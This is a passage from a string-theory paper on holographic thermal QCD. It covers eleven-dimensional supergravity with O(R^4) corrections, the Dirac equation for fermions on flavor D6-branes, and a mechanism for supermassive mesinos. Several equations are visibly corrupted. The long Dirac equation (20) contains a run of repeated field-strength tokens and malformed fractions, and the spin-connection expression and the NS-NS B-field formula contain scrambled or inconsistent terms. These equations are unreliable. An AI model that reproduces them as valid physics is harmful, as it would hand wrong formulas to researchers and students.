\(\mathbb{R}^{2}(x^{1,2})\times S^{1}(x^{3})\) with the period of \(S^{1}(x^{3})\) given by a very large: \(\frac{2\pi}{M_{\rm KK}}\), where the very small \(M_{\rm KK}\) is given by \(\frac{2r_{0}}{L^{2}}\left[1+\mathcal{O}\left(\frac{g_{s}M^{2}}{N}\right)\right]\), \(r_{0}\) being the very small IR cut-off in the thermal background (see also [16]) and \(L=(4\pi g_{s}N)^{\frac{1}{4}}\). So, \(\lim_{M_{\rm KK}\to 0}\mathbb{R}^{2}(x^{1,2})\times S^{1}(x^{3})= \mathbb{R}^{3}(x^{1,2,3})\), thereby recovering 4D physics. The working metric for the thermal background corresponding to \(T<T_{c}\) will involve setting \(\tilde{g}(r)\) to unity in (5). Eleven dimensional supergravity action including \(\mathcal{O}(R^{4})\) terms used in [3] is: \[S=\frac{1}{2\kappa_{11}^{2}}\int_{M}\left[\mathcal{R}*_{11}1- \frac{1}{2}G_{4}\wedge*_{11}G_{4}-\frac{1}{6}C\wedge G\wedge G\right]+\frac{1} {\kappa_{11}^{2}}\int_{\partial M}d^{10}x\sqrt{h}K\] \[+\frac{1}{(2\pi)^{4}3^{2}2^{13}}\left(\frac{2\pi^{2}}{\kappa_{11 }^{2}}\right)^{\frac{1}{3}}\int d^{11}x\sqrt{-g}\left(J_{0}-\frac{1}{2}E_{8} \right)+\left(\frac{2\pi^{2}}{\kappa_{11}^{2}}\right)\int C_{3}\wedge X_{8}, \tag{6}\] where: \[J_{0}=3\cdot 2^{8}(R^{HMNK}R_{PMNQ}R_{H}{}^{RSP}R^{Q}{}_{RSK}+ \frac{1}{2}R^{HKMN}R_{PQMN}R_{H}{}^{RSP}R^{Q}{}_{RSK}),\] \[E_{8}=\frac{1}{3!}\epsilon^{ABCM_{1}N_{1}\ldots M_{4}N_{4}} \epsilon_{ABCM_{1}^{\prime}N_{1}^{\prime}\ldots M_{4}^{\prime}N_{4}^{\prime}}R^ {M_{1}^{\prime}N_{1}^{\prime}}_{M_{1}N_{1}}\ldots R^{M_{4}^{\prime}N_{4}^{ \prime}}{}_{M_{4}N_{4}},\] \[\kappa_{11}^{2}=\frac{(2\pi)^{8}l_{p}^{9}}{2}. \tag{7}\] The equations of motion for metric and three form potential \(C\) are: \[\text{EOM}_{\text{MN}}:\ R_{MN}-\frac{1}{2}g_{MN}\mathcal{R}- \frac{1}{12}\left(G_{MPQR}G_{N}^{\ PQR}-\frac{g_{MN}}{8}G_{PQRS}G^{PQRS}\right)\] \[=-\beta\left[\frac{g_{MN}}{2}\left(J_{0}-\frac{1}{2}E_{8}\right) +\frac{\delta}{\delta g^{MN}}\left(J_{0}-\frac{1}{2}E_{8}\right)\right],\] \[d*G=\frac{1}{2}G\wedge G+3^{2}2^{13}\left(2\pi\right)^{4}\beta X _{8},\] where [17]: \[\beta\equiv\frac{\left(2\pi^{2}\right)^{\frac{1}{3}}\left(\kappa_{11}^{2} \right)^{\frac{2}{3}}}{\left(2\pi\right)^{4}3^{2}2^{12}}\sim l_{p}^{6}, \tag{9}\] \(R_{MNPQ},R_{MN},\mathcal{R}\) in (6)/(8) are eleven-dimensional Riemann curvature tensor, Ricci tensor, and the Ricci scalar. To solve (8), the following ansatz was made: \[g_{MN}=g_{MN}^{(0)}+\beta g_{MN}^{(1)},\] \[C_{MNP}=C_{MNP}^{(0)}+\beta C_{MNP}^{(1)}. \tag{10}\] EOM for \(C_{MNP}\) symbolically can be written as: \[\beta\partial\left(\sqrt{-g}\partial C^{(1)}\right)+\beta\partial \left[\left(\sqrt{-g}\right)^{(1)}\partial C^{(0)}\right]+\beta\epsilon_{11} \partial C^{(0)}\partial C^{(1)}=\mathcal{O}(\beta^{2})\sim 0[\text{up to }\mathcal{O}( \beta)].\] It was shown in [3], that, \(C_{MNP}^{(1)}=0\) up to \(\mathcal{O}(\beta)\). Therefore only the metric receives \(\mathcal{O}(R^{4})\) corrections defined as: \[\delta g_{MN}=\beta g_{MN}^{(1)}=G_{MN}^{\text{MQGP}}f_{MN}(r). \tag{12}\] In general, the \(\mathcal{M}\) theory metric has the following form including \(\mathcal{O}(R^{4})\) corrections: \[G_{MN}^{\mathcal{M}}=G_{MN}^{\text{MQGP}}\left(1+\beta f_{MN}(r) \right). \tag{13}\] The EOMs for \(f_{MN}(r)\) were solved in [3]. The type IIA metric inclusive of \(\mathcal{O}(R^{4})\) corrections were obtained from the \(\mathcal{M}\)-theory metric by descending back to type IIA string theory, which has the following form: \[G_{mn}^{\text{IIA}}=\sqrt{G_{x^{10}x^{10}}^{\text{M}}}G_{mn}^{\text{MQGP}} \left(1+\frac{f_{x^{10}x^{10}(r)}}{2}+f_{mn}(r)\right). \tag{14}\] The type IIB dual of large-\(N\) thermal QCD-like theories as constructed in [2] and its type IIA mirror as constructed in [1], [12] were successfully used to study a variety of issues in Condensed Matter Physics, lattice/PDG-compatible particle phenomenology, doubly holographic extension and Page curves of associated eternal black holes and \(G\)/(Almost)Contact(3)Metric structure classification of underlying six-, seven- and eight-folds in differential geometry (see E). ## 3 Supermassive Mesinos in Type IIA String Theory The fermionic sector of type IIA holographic dual of QCD as constructed in [8] has the following problems. Not only are the mesinos approximately isospectral with the mesons, the single-meson-mesino interaction terms are not large-\(N\) suppressed [9] (see also [18] for mesino spectroscopy degenerate with mesons in the context of [8] and [14]). Evidently, this is in contradiction with QCD/PDG as no mesino at the EW scale has thus far been observed. What we show in this section is that Dirichlet/Neumann boundary condition at the IR cut-off (for the gravity dual corresponding to \(T<T_{c}\)) or the horizon radius (for the gravity dual corresponding to \(T>T_{c}\)) is consistent with having a supermassive mesino. Further, we show an \(N\)-enhancement of the Kaluza-Klein mass scale via an \(N\)-enhancement of the resolution parameter for the thermal background (\(T<T_{c}\)), hence providing the mechanism of generation of the aforementioned supermassive mesino. Even though we have not been able to provide in 3 an analog of the \(N\)-enhancement of the resolution parameter (that was seen in the thermal background corresponding to \(T<T_{c}\)) for the black hole background corresponding to \(T>T_{c}\), the following should be noted. In 3, what we were able to show for the gravity duals of both the low and high-temperature QCD-like theories is that Dirichlet/Neumann boundary condition at the IR cut-off, horizon radius respectively in the gravity duals for \(T<T_{c},\ T>T_{c}\), do not fix the mesino mass. We can hence take the same to be large, and via the aforementioned \(N\)-enhancement of the resolution parameter in the former, we had explicitly shown the mechanism of obtaining supermassive mesinos in the thermal background. Given that we were able to show the vanishing of meson-mesino-mesino interaction in 5, even if the mesinos were of the EW scale, there still will be no contradiction with real QCD. The DBI action for the fermions on flavor D6-branes has the following structure [6]: \[S_{D_{6}}^{f}=\frac{T_{D_{6}}}{2}\int d^{7}\xi e^{-\Phi^{\rm IIA}}\sqrt{-{\rm det }(i^{*}g^{\rm IIA}+{\cal F}^{\rm IIA})}\ \overline{\Theta}\left(1-\Gamma_{D_{6}}\right)\left(\Gamma^{\alpha}D_{ \alpha}-\Delta+L_{D_{6}}\right)\Theta, \tag{15}\] where \(\Phi^{\rm IIA}\) is the type IIA dilaton. We can define: \[{\cal F}^{\rm IIA}_{\alpha_{1}\alpha_{2}}=i^{*}B^{\rm IIA}_{\alpha_{1}\alpha_ {2}}+F^{\rm IIA}_{\alpha_{1}\alpha_{2}}, \tag{16}\] such that \(B^{\rm IIA}_{\alpha_{1}\alpha_{2}}\) and \(F^{\rm IIA}_{\alpha_{1}\alpha_{2}}\) are NS-NS B field and gauge field restricted to the world volume of \(D6\)-branes. Further, \(\Gamma_{D_{6}}\) and \(L_{D_{6}}\) appearing in (15) are defined as 3: Footnote 3: Indices, \(m,n,p\) correspond to type IIA bulk indices and \(\alpha_{i},\beta_{i},\gamma\) etc. correspond to indices on world-volume of flavor \(D6\)-branes. \[\Gamma_{D6}=\sum_{q+r=3}\frac{(-)^{r+1}\left(\Gamma_{10}\right)^{r +1}\epsilon^{\alpha_{1}....\alpha_{2q}\beta_{1}....\beta_{2r+1}}}{q!(2r+1)!2^{ q}\sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}}\mathcal{F} _{\alpha_{1}\alpha_{2}}^{\mathrm{IIA}}.....\mathcal{F}_{\alpha_{2q-1}\alpha_{2 q}}^{\mathrm{IIA}}\Gamma_{\beta_{1}.....\beta_{2r+1}},\] \[\Delta=\Delta^{(1)}+\Delta^{(2)},\] \[L_{D_{6}}=\sum_{q\geq 1,q+r=3}\frac{(-)^{r+1}\left(\Gamma_{10} \right)^{r+1}\epsilon^{\alpha_{1}....\alpha_{2q}\beta_{1}....\beta_{2r+1}}}{q! (2r+1)!2^{q}\sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA }})}}\mathcal{F}_{\alpha_{1}\alpha_{2}}.....\mathcal{F}_{\alpha_{2q-1}\alpha_{ 2q}}\Gamma_{\beta_{1}.....\beta_{2r+1}}{}^{\gamma}D_{\gamma}, \tag{17}\] where \(D_{m}=D_{m}^{(0)}+W_{m}\), and \[D_{m}^{(0)}=\nabla_{m}+\frac{1}{4.2!}H_{mnp}\Gamma^{np}\Gamma_{ (10)},\] \[W_{m}=-\frac{1}{8}e^{\Phi^{\mathrm{IIA}}}\left(\frac{1}{2}F_{np} \Gamma^{np}\Gamma_{(10)}+\frac{1}{4!}F_{npqr}\Gamma^{npqr}\right)\Gamma_{m},\] \[\Delta^{(1)}=\frac{1}{2}\left(\Gamma^{m}\partial_{m}\Phi^{ \mathrm{IIA}}+\frac{1}{2.3!}H_{mnp}\Gamma^{mnp}\Gamma_{(10)}\right),\] \[\Delta^{(2)}=\frac{1}{8}e^{\Phi^{\mathrm{IIA}}}\left(\frac{3}{2!} F_{mn}\Gamma^{mn}\Gamma_{(10)}-\frac{1}{4!}F_{mnpq}\Gamma^{mnpq}\right), \tag{18}\] where covariant derivative is defined as: \(\nabla_{m}=\partial_{m}+\frac{1}{4}\Omega_{m}^{np}\Gamma_{np}\). \(F_{mn}\) and \(F_{mnpq}\) are field strength tensors corresponding to type IIA \(A_{n}\) and \(A_{npq}\), and \(H_{mnp}=\partial_{[m}B_{np]}\). For flavor \(D6\)-branes in type IIA string theory \[\Gamma_{\mathrm{D6}}=\frac{\epsilon^{\beta_{1}.....\beta_{7}} \Gamma_{\beta_{1}....\beta_{7}}}{\sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+ \mathcal{F}^{\mathrm{IIA}})}}-\frac{\Gamma_{(10)}\left(\epsilon^{\alpha_{1} \alpha_{2}\beta_{1}.....\beta_{5}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{\mathrm{ IIA}}\Gamma_{\beta_{1}.....\beta_{5}}\right)}{5!\sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+ \mathcal{F}^{\mathrm{IIA}})}}\] \[+\frac{\epsilon^{\alpha_{1}...\alpha_{4}\beta_{1}\beta_{2}\beta_{ 3}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{\mathrm{IIA}}\mathcal{F}_{\alpha_{3} \alpha_{4}}^{\mathrm{IIA}}\Gamma_{\beta_{1}\beta_{2}\beta_{3}}}{48\sqrt{- \mathrm{det}(i^{*}g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}}-\frac{\Gamma_{ (10)}\left(\epsilon^{\alpha_{1}...\alpha_{6}\beta_{1}}\mathcal{F}_{\alpha_{1} \alpha_{2}}^{\mathrm{IIA}}\mathcal{F}_{\alpha_{3}\alpha_{4}}^{\mathrm{IIA}} \mathcal{F}_{\alpha_{5}\alpha_{6}}^{\mathrm{IIA}}\Gamma_{\beta_{1}}\right)}{48 \sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}},\] \[L_{\mathrm{D6}}=-\frac{\Gamma_{(10)}\left(\epsilon^{\alpha_{1} \alpha_{2}\beta_{1}.....\beta_{5}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{\mathrm{ IIA}}\Gamma_{\beta_{1}...\beta_{5}}{}^{\gamma}D_{\gamma}\right)}{240\sqrt{-\mathrm{det}(i^{*}g^{ \mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}}+\frac{\epsilon^{\alpha_{1}... \alpha_{4}\beta_{1}\beta_{2}\beta_{3}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{ \mathrm{IIA}}\mathcal{F}_{\alpha_{3}\alpha_{4}}^{\mathrm{IIA}}\Gamma_{\beta_{1} \beta_{2}\beta_{3}}^{\gamma}D_{\gamma}}{48\sqrt{-\mathrm{det}(i^{*}g^{ \mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}}.\] The Dirac equation for the DBI action for the fermions on flavor \(D6\)-branes appearing in type IIA string dual of thermal QCD-like theories turns out to be: \[\left[\mathcal{A}-\frac{\epsilon^{\alpha_{1}\alpha_{2}\beta_{1}..... \beta_{5}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{\mathrm{IIA}}\Gamma_{\beta_{1}....\beta_{5}}{}^{\gamma}D_{\gamma}\Gamma_{(10)}}{240\sqrt{-\mathrm{det}(i^{*} g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}}-\frac{\epsilon^{\beta_{1}.....\beta_{7}} \mathcal{F}_{\beta_{1}....\beta_{7}}^{\mathrm{IIA}}\Gamma_{\beta_{6}\beta_{1}....\beta_{5}}{}^{\gamma}\Gamma_{\beta_{1}....\beta_{5}}{}^{\gamma}D_{\gamma }\Gamma_{(10)}}{7!\sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+\mathcal{F}^{ \mathrm{IIA}})}}+\frac{4\Gamma^{\beta_{1}.....\beta_{7}}\mathcal{F}_{\beta_{6} \beta_{1}....\beta_{5}}{}^{\gamma}D_{\gamma}\Gamma_{(10)}}{7!\sqrt{-\mathrm{ det}(i^{*}g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}}\] \[+\frac{\epsilon^{\alpha_{1}\alpha_{2}\beta_{1}.....\beta_{5}} \mathcal{F}_{\alpha_{1}\alpha_{2}}^{\mathrm{IIA}}\Gamma_{\beta_{1}....\beta_{5}} \Gamma_{(10)}\mathcal{A}}{5!\sqrt{-\mathrm{det}(i^{*}g^{\mathrm{IIA}}+ \mathcal{F}^{\mathrm{IIA}})}}+\frac{7!\mathcal{F}_{\alpha_{1}\alpha_{2}}^{ \mathrm{IIA}}\Gamma_{\beta_{1}\alpha_{2}}^{\mathrm{IIA}}\Gamma_{\beta_{1}.... \beta_{5}}{}^{\gamma}D_{\gamma}\Gamma_{(10)}}{5!240\left(-\mathrm{det}(i^{*} g^{\mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})\right)}+\frac{\epsilon^{\alpha_{1}.. \alpha_{4}\beta_{1}\beta_{2}\beta_{3}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{ \mathrm{IIA}}\mathcal{F}_{\alpha_{3}\alpha_{4}}^{\mathrm{IIA}}\Gamma_{\beta_{1} \beta_{2}\beta_{3}}\mathcal{F}_{\alpha_{4}}^{\mathrm{IIA}}\Gamma_{\beta_{1} \beta_{2}\beta_{3}}\mathcal{F}_{\alpha}\] \[-\frac{\Gamma_{(10)}\mathcal{F}_{\mathrm{IIA}}^{2}\mathcal{F}_{ \beta_{4}\beta_{5}}^{\mathrm{IIA}}\Gamma_{\beta_{1}\beta_{2}\beta_{3}}\Gamma_{ \beta_{1}....\beta_{5}}{}^{\gamma}D_{\gamma}}{480\left(-\mathrm{det}(i^{*}g^{ \mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})\right)}+\frac{7!\mathcal{F}_{\mathrm{ IIA}}^{4}\Gamma_{\beta_{1}\beta_{2}\beta_{3}}\Gamma_{\beta_{1}\beta_{2}\beta_{3}} ^{\beta_{1}\beta_{2}\beta_{3}\gamma}D_{\gamma}}{48\sqrt{-\mathrm{det}(i^{*}g^{ \mathrm{IIA}}+\mathcal{F}^{\mathrm{IIA}})}-\frac{\Gamma_{(10)}\left(\epsilon^{ \alpha_{1}....\alpha_{6}\beta_{1}}\mathcal{F}_{\alpha_{1}\alpha_{2}}^{\mathrm{ IIA}}\mathcal{F}_{\alpha_{3}\alpha_{4}}^{\mathrm{IIA}}\mathcal{F}_{\alpha_{5} \alpha_{6}}^{\mathrm{IIA}}\Gamma_{\beta_{1}\right)\mathcal{A}}\] \[+\frac{\delta^{[\alpha_{3}\delta^{\alpha_{4}}_{\beta_{3}}\delta^{\alpha_{ 4}}_{\delta_{4}}\delta^{\alpha_{6}}_{\beta_{5}}]}_{\rm IIA}\mathcal{F}^{\rm IIA}_{ \rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{ \rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA} \mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA }_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}}{48\left(- \mathrm{det}(i^{*}g^{\rm IIA}+\mathcal{F}^{\rm IIA})\right)}-\frac{\mathcal{F}^{ \rm 2}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA} \mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}\mathcal{F}^{\rm IIA }_{\rm IIA}\mathcal{F}^{\rm IIA}_{\rm IIA}}{48\left(-\mathrm{det}(i^{*}g^{\rm IIA }+\mathcal{F}^{\rm IIA})\right)}\Bigg{]}\Theta=0, \tag{20}\] where \[\mathcal{A}=\Gamma^{\alpha}D_{\alpha}-\frac{1}{2}\left(\Gamma^{m}\partial_{m} \Phi^{\rm IIA}+\frac{1}{12}H_{mnp}\Gamma^{mnp}\Gamma_{(10)}\right)-\frac{1}{8 }\epsilon^{\Phi^{\rm IIA}}\left(\frac{3}{2}F_{mn}\Gamma^{mn}\Gamma_{(10)}- \frac{1}{4!}F_{mnpq}\Gamma^{mnpq}\right). \tag{21}\] In (21), \(F_{mnpq}\) is the type IIA RR four-form field strength. This in our computation is set to zero as one can show that the same can not be generated by a triple T dual of the RR \(F^{IIB}_{1,3,5}\)[1]. Type IIA NS-NS \(B\) is given by [19]: \[B^{\rm IIA}\left(\theta_{1}=\frac{\alpha_{\theta_{1}}}{N^{\frac {1}{5}}},\theta_{2}\sim\frac{\alpha_{\theta_{2}}}{N^{\frac{1}{10}}}\right)=d \theta_{2}\wedge d\bar{x}\left(-\frac{2\sqrt[4]{\pi}\,\sqrt[4]{g_{s}}N^{3/4} \left(3\sqrt{6}\alpha_{\theta_{1}}^{3}-2\alpha_{\theta_{1}}^{2}\sqrt[4]{N}+2 \alpha_{\theta_{2}}^{2}\right)}{27\alpha_{\theta_{1}}^{4}\alpha_{\theta_{2}}}\right)\] \[+d\theta_{2}\wedge d\bar{y}\left(\frac{2\sqrt[4]{\pi}\,\sqrt[4]{g _{s}}N^{3/4}\left(3\sqrt{6}\alpha_{\theta_{1}}^{3}-2\alpha_{\theta_{1}}^{2} \sqrt[5]{N}+2\alpha_{\theta_{2}}^{2}\right)}{27\alpha_{\theta_{1}}^{4}\alpha_ {\theta_{2}}}\right)+d\theta_{2}\wedge d\bar{z}\left(-\frac{\sqrt[4]{\pi}\, \alpha_{\theta_{2}}\,\sqrt[4]{g_{s}}N^{3/20}\left(2\left(\sqrt[4]{3}-1\right) \alpha\sqrt[4]{N}+\sqrt[4]{3}\alpha_{\theta_{2}}\right)}{3^{5/6}\alpha\sqrt {\alpha_{\theta_{2}}^{2}}}\right).\] When we restrict to the world-volume of \(D6\)-branes, then only the non-trivial component that survives will be \(B^{\rm IIA}_{\theta_{2}\tilde{y}}\). The induced metric on the world volume of \(D6\)-branes can be obtained from the target space metric as given below: \[ds^{2}_{\rm D6}=ds^{2}_{5}+g^{\rm IIA}_{\theta_{2}\theta_{2}}d\theta_{2}^{2}+ g^{\rm IIA}_{\theta_{2}\tilde{y}}d\theta_{2}d\tilde{y}+g^{\rm IIA}_{\tilde{y} \tilde{y}}d\tilde{y}^{2}. \tag{23}\] Typically, type IIA metric is not diagonal in the basis \((x,y,z)\). Since we need the metric component along \(\tilde{y}\)-direction therefore, we are writing the metric in diagonal basis in subspace \((\tilde{x},\tilde{y},\tilde{z})\)[19]: \[ds^{2}=\frac{2d\tilde{x}^{2}\left(9\sqrt{2}\,\sqrt[4]{3}\alpha_{ \theta_{1}}N^{4/5}-2\ 3^{2/3}N\right)}{27\alpha_{\theta_{1}}^{2}\alpha_{\theta_{2}}^{2}}+\frac{2d \tilde{y}^{2}\left(2\ 3^{2/3}N-9\sqrt{2}\,\sqrt[4]{3}\alpha_{\theta_{1}}N^{4/5}\right)}{27 \alpha_{\theta_{1}}^{2}\alpha_{\theta_{2}}^{2}}\] \[+\frac{2d\tilde{z}^{2}\left(3^{2/3}\alpha_{\theta_{1}}^{2}N^{3/5} +3^{2/3}\alpha_{\theta_{2}}^{2}N^{2/5}\right)}{27\alpha^{2}\alpha_{\theta_{2} }^{2}}. \tag{24}\] \(ds^{2}_{5}\) in (23) is non-compact metric listed along \((t,x^{1,2,3},r)\) subspace, and from (24), \(g^{\rm IIA}_{\theta_{2}\tilde{y}}=0\) and \(g^{\rm IIA}_{\tilde{y}\tilde{y}}=\frac{2\left(2\ 3^{2/3}N-9\sqrt{2}\,\sqrt[4]{3}\alpha_{\theta_{1}}N^{4/5}\right)}{27 \alpha_{\theta_{1}}^{2}\alpha_{\theta_{2}}^{2}}\). Consider the DBI action on the world volume of flavor \(D6\)-branes: \[S^{\rm D6}_{\rm DBI}=-T_{D6}N_{f}\int_{\Sigma_{(7)}}\sqrt{-\mathrm{det}(i^{*} \left(g^{\rm IIA}+B^{\rm IIA}\right)+F^{\rm IIA})}, \tag{25}\] \(i:\Sigma_{(7)}\cong S^{1}_{t}\times_{w}\mathbb{R}^{3}\times\mathbb{R}_{\geq 0 }\times_{w}S^{2}_{\rm squashed}(a)\hookrightarrow M_{10}\) [the embedding of the flavor \(D6\)-branes in the ten-dimensional background involving a warped squashed resolved conifold] in the \(\psi=2n\pi,n=0,1,2\)-coordinate patches and vanishingly small Ouyang embedding parameter in the parent type IIB dual. Using the induced metric on the flavor \(D6\)-branes as given in (23), NS-NS \(B^{\rm IIA}\) as given in (22) and turning on a baryon chemical potential (by looking at the DBI action in the UV and solving for \(A_{t}(r)\) - see (A1)) corresponding to \(U(1)\) sub-group of \(U(N_{f})\) with the associated field strength \(F_{rt}=A_{t}^{\prime}(r)\), the background \(A_{t}(r)\) can be obtained (see appendix A). In the IR, \({\cal L}_{\rm DBI,\ on-shell}^{\rm D6}\), for \(N\sim 10^{2}\), can be shown to be infinitesimal. The coefficient of the most dominant (quadratic) powers of \(\frac{1}{{\cal L}_{\rm DBI,\ on-shell}^{\rm D6}}\) in (20) marked in blue, is proportional to \(\Gamma^{\gamma}D_{\gamma}\Theta,\gamma\in\left\{t,x^{1,2,3},r,\theta_{2},\tilde {y}\right\}\big{|}_{\left\{\tilde{x}=0,\tilde{z}={\rm constant}\right\}}\) where \((\tilde{x},\tilde{y},\tilde{z})\) diagonalize \(T^{3}(x,y,z)\) of 2. One can further show: \(E_{\underline{a}}^{\gamma}\Gamma^{\underline{a}}D_{\gamma}\Theta|_{(\tilde{ \lambda})}\approx 0.\) The non-Kahler six-fold \(M_{6}=S_{t}^{1}\times_{w}{\cal T}\) (\(\times_{w}\) implying a warped product), \(S_{t}^{1}\) being the thermal circle and \({\cal T}\) - deformed \(T^{1,1}\) - being the base of a warped non-Kahler squashed resolved conifold, was shown to possess an \(SU(3)\) structure in [3], with another "transverse" \(SU(3)\) structure induced from the (Almost) Contact Metric Structure [10] arising from the \(G_{2}\) structure of warped product of the \({\cal M}\)-theory circle and \(M_{6}\). Further, the non-Kahler warped squashed resolved conifold \(\tilde{M}_{6}\) in the type IIA dual also possesses an \(SU(3)\) structure [12], [3]. Either way, one is therefore guaranteed the existence of a pair of globally defined spinors \(\Theta_{1,0}\) and \(\Theta_{2,0}\) (either by looking at the \(SU(3)\) and the "transverse" \(SU(3)\) structures on \(M_{6}/\tilde{M}_{6}\) or when considering the embedding of the \(D6\)-brane world volume \(\Sigma_{(7)}\cong S_{t}^{1}\times_{w}(\mathbb{R}^{3}\times\mathbb{R}_{\geq 0 })\times_{w}S_{\rm squashed}^{2}\) in \(M_{10}\) considered either as \((S_{t}^{1}\times_{w}\mathbb{R}^{3})\times_{w}\tilde{M}_{6}\) or \(\mathbb{R}^{3}\times_{w}(\mathbb{R}_{\geq 0}\times M_{6}))\). Making an ansatz: \[\Theta_{i}(x^{\mu},y^{m})=\Theta_{i}(t,x^{1},r,\theta_{2})=\sum_{n:-\infty}^ {\infty}T_{n}(t)e^{-\sqrt{-1}px^{1}}R_{n,i}(r)\left(1+\beta f_{i}(\theta_{2}) \right)\Theta_{i,0},i=1,2, \tag{26}\] \(\beta\sim l_{p}^{6}\) (\(l_{p}\) being the Planckian length) and assuming \(T_{n}(t)=e^{i(2n+1)\pi Tt}\) (as one imposes anti-periodic boundary conditions on the fermions along the thermal circle thereby breaking supersymmetry [20]) implying \(\Theta(t+1/T,r)=-\Theta(t,r)\), (and after a double Wick rotation along \(t,x^{1}\), \(p^{2}=-m_{\rm Mesino}^{2}\) with \(m_{\rm Mesino}\) being the non-supersymmetric mesino mass in the holographic dual of QCD\({}_{\rm Mesino}\)) analogous to the relation between the killing spinors \(\epsilon_{1,2}\) for a supersymmetric \(D6\)-brane in flat space: \(\epsilon_{1}=\Gamma^{\underline{89}}\ \underline{10}\epsilon_{2}\), we will impose, by hand, and for our non-supersymmetric model: \(\Theta_{1,0}=\Gamma^{\underline{68}}\ \underline{10}\Theta_{2,0}\), in a curved space, where \(\Theta_{1,2}\equiv\frac{1}{2}\left(1+/-\Gamma^{{(10)}}\right)\Theta\), \(\Gamma^{{(10)}}\equiv\prod_{\underline{a}=\underline{0}}^{\underline{9}}\Gamma ^{\underline{a}}\), \(\underline{A}\), with \(A=1,...,10\) denoting the ten-dimensional tangent space indices. The most dominant spin-connection terms in the IR are contained in \(E_{\underline{5}}^{r}\Gamma^{\underline{5}}D_{r}\Theta\), in particular \(\frac{7}{\omega_{r}^{7}}\frac{10}{\omega_{r}^{7}}\frac{8}{\omega_{r}^{7}}\ \underline{10}\) respectively for the thermal("TH"), black-hole ("BH") backgrounds. Consequently, substituting (26) into \(\Theta\)'s EOM (details given in this section and B), the same at \({\cal O}(\beta)\) is: \[\left[i(2n+1)\pi TR_{2,n}(r)f_{2}(\theta_{2})+\frac{E_{\underline {5}}^{\theta_{2}}}{E_{\underline{1}}^{r}}\Gamma^{\underline{1}7}R_{2,n}(r)f_{ 2}^{\prime}(\theta_{2})+\frac{E_{\underline{5}}^{r}}{E_{\underline{1}}^{r}} \Gamma^{\underline{15}}R_{2,n}^{\prime}(r)f_{2}(\theta_{2})-ip\frac{E_{ \underline{5}}^{\theta_{2}^{1}}}{E_{\underline{1}}^{r}}\Gamma^{\underline{1 2}}R_{2,n}(r)f_{2}(\theta_{2})\right]\Theta_{2,0}\] \[-{\cal J}(r)R_{1,n}(r)f_{1}(\theta_{2})\Gamma^{\underline{15678} }\Theta_{1,0}=0, \tag{27}\] with \({\cal J}\equiv\omega_{r}^{7}\frac{10}{E_{\underline{5}}^{r}}\) (\(E_{\underline{a}}^{M}\) being the frames: \(E_{\underline{a}}^{M}g_{MN}E_{\underline{b}}^{N}=\eta_{\underline{a}\underline {b}}\)) for the TH background; for the BH background, \(\Gamma^{\underline{15678}}\) in the second line of (27) is to be replaced by \(\Gamma^{\underline{1566}}\) with \({\cal J}\equiv\omega_{r}^{8}\frac{10}{E_{\underline{5}}^{r}}\). Note, we have disregarded all \(\mathcal{O}\left(\frac{\beta}{N^{\alpha}}\right),\ \alpha\geq 1\) terms (see footnote **1**) and therefore there are no \(\beta\) corrections in \(\frac{E_{2}^{\theta_{2}}}{E_{1}^{\prime}},\frac{E_{3}^{\prime}}{E_{1}^{\prime}}, \frac{E_{2}^{\prime 1}}{E_{1}^{\prime}}\). One thus sees that the only consistent solution for \(f_{i}(\theta_{2})\) is \(f_{i}(\theta_{2})=0\) for the TH/BH backgrounds. Defining \(u\equiv\sqrt{r-r_{0}}\), the EOM for \(R_{n,2}(r)\) for the TH type IIA background with \(\Gamma^{\underline{1}\underline{5}}\Theta_{2,0}=\Theta_{2,0},\ \Gamma^{ \underline{1}\underline{2}}\Theta_{2,0}=\Theta_{2,0}\), can be recast into a Schrodinger-like equation (where, \(a_{1},b_{1},\mathcal{A}_{\Theta_{2}},\mathcal{B}_{\Theta_{2}},\mathcal{A}_{ \Theta_{2}^{\prime}},\mathcal{B}_{\Theta_{2}^{\prime}}\) are defined in (B5)): \[\chi_{2,n}^{\prime\prime}(u)+V(u)\chi_{2,n}(u)=0, \tag{28}\] where, \[V(u)=-\frac{3}{4u^{2}}+\frac{\mathcal{A}_{\Theta_{2}^{\prime}}}{a_{1}u}-\frac {\mathcal{A}_{\Theta_{2}^{\prime}}}{a_{1}^{2}}+\mathcal{O}(u), \tag{29}\] and, \[R_{2,n}(u)=\sqrt{u}\left(a_{1}+b_{1}u^{2}\right)^{-\frac{\mathcal{B}_{\Theta_{ 2}^{\prime}}}{2b_{1}}}e^{-\frac{\mathcal{A}_{\Theta_{2}^{\prime}}\tan^{-1} \left(\frac{\sqrt{b_{1}}}{\sqrt{a_{1}}}\right)}{\sqrt{a_{1}}\sqrt{a_{1}}}}\chi 